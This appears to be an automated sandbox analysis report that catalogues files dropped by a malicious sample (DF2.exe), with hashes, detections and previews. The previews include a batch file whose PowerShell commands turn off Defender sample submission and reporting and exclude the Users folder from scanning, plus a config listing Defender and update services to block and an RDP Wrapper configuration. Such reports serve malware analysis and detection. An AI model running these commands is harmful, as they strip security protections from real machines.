Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.25860377459178
Encrypted:	false
SSDEEP:	1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
MD5:	BD1D98C35FE2CB3E14A655AEDE9D4B01
SHA1:	49361C09F5A75A4E2D6E85FBDA337FC521770793
SHA-256:	961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
SHA-512:	74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	5.476242505034718
Encrypted:	false
SSDEEP:	48:CFdHr+54yclDYcm9FLnFlFW05ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9VFl6D
MD5:	1D1C40526D89341E8829453D3EC08688
SHA1:	392975AFF5626BB6DCEAE19C2649210778FBFE37
SHA-256:	7FE9A5DD2646E45579E355896841D36D9AD47F451F38E87238E111AC60D6225E
SHA-512:	01379557DCA82CE25B39EC38FBF2F783743012FBC9408DEDB0F3DE46454B9FB126A99EBE0A1C826B9028AA681A7B9529FFEFA2B3BDD16D56B36ED90801CA950F
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1177e342)..[I] (tcp_connect) -

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2041507656664825
Encrypted:	false
SSDEEP:	1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
MD5:	CB4F460CF2921FCD35AC53F4154FCBE0
SHA1:	AFD91433EF0C03315739FB754B16D6C49D2E51F2
SHA-256:	D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
SHA-512:	BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	456534
Entropy (8bit):	5.450314708570292
Encrypted:	false
SSDEEP:	1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
MD5:	AC8B2EA4A310D6748A8845C235A3CDC8
SHA1:	0B489969C7D95411E4104B9BB952C0024EDE1616
SHA-256:	77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
SHA-512:	0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

Download File

Process:	C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
File Type:	data
Category:	dropped
Size (bytes):	10480965
Entropy (8bit):	6.710750822103746
Encrypted:	false
SSDEEP:	196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
MD5:	458F2D710689EA3CF61D5CD97C6B2470
SHA1:	BA71901A29F77715A3DC952578F6D249B944FE26
SHA-256:	47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
SHA-512:	C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
Malicious:	false
Preview:	.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat

Download File

Process:	C:\Users\user\Desktop\DF2.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.933902901538645
Encrypted:	false
SSDEEP:	6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:	261A842203ADB67547C83DE132C7A076
SHA1:	6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:	49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:	7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:	true
Preview:	@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vmvxjwl.4eg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kuyxzmq.bbf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4expr1ke.fcz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dw5fsxj.0nj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fz2thp03.pq1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_girqjzdf.bgu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3bavdcd.1rg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3nqh2ti.uqp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omshdqct.a3a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjepb1k5.0fx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5ngr01y.uyt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl3rc2n2.l30.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\installer.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3744
Entropy (8bit):	5.505070443586618
Encrypted:	false
SSDEEP:	96:isYJ9VFlDT0HU0Hn0H12ON00He0H+kQHR3+PrT60HMVVH3HF0HMttHMj:DiTXT000H0UON00+0TQxOPrT60AVXl0j
MD5:	CA696858DA9B297D70FBEA1CFE2FA988
SHA1:	BB4A9092341B8BD857771F17DA2502A8C38F0F08
SHA-256:	283B508164273D6194577E4725641996A03099811B3A0A354DB8057A5F9051EA
SHA-512:	2E1ECD31EE4593D3EFCA4C01A9A74C697C175B1BB8B7C0133DFC9B7378EE2F8165F6CB912AB32DA34D5AEA4C7E5281FF57680E2707C19B843143797BE23DBB48
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10

C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Download File

Process:	C:\Users\user\Desktop\DF2.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10669056
Entropy (8bit):	7.443816651911507
Encrypted:	false
SSDEEP:	98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
MD5:	2F829F1CB631D234C54F2E6C6F72EB57
SHA1:	BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
SHA-256:	09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
SHA-512:	71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Download File

Process:	C:\Users\user\Desktop\DF2.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.298274541598319
Encrypted:	false
SSDEEP:	1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
MD5:	319865D78CC8DF6270E27521B8182BFF
SHA1:	716E70B00AA2D154367028DE896C7D76C9D24350
SHA-256:	A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
SHA-512:	78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....\|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................\|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wfpblk.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
File Type:	Generic INItialization configuration [svc]
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.692426693515089
Encrypted:	false
SSDEEP:	3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
MD5:	E025B58CB2D118FAFAE00850EE91C5F9
SHA1:	DD23CE328F593AF74455F2C2F805B662466A1205
SHA-256:	897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
SHA-512:	5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
Malicious:	false
Preview:	[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

C:\Users\user\AppData\Local\Temp\wfpblk.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	22722
Entropy (8bit):	5.184533935957373
Encrypted:	false
SSDEEP:	384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888AO:ubbEbNQ6s69WS8vv88o8888888888881
MD5:	D54CFDE38F3D246E0E738AF07D21274F
SHA1:	93EA2079056DC183F190B2D6331EEDA97CD83ACE
SHA-256:	669DCBC3C0530219523D6B69D69D6A2B150F4145B0B9251D041B6689F4D8598E
SHA-512:	F13BD5CF5DF2772B72E693177CEDCD9201CCB9AA40CF348C05E0DFBBB578B1104FB38A43B3DCF4467C203E3F88DB99F123CFD7DF99BF3D3B52B7CF5A1E4C2911
Malicious:	false
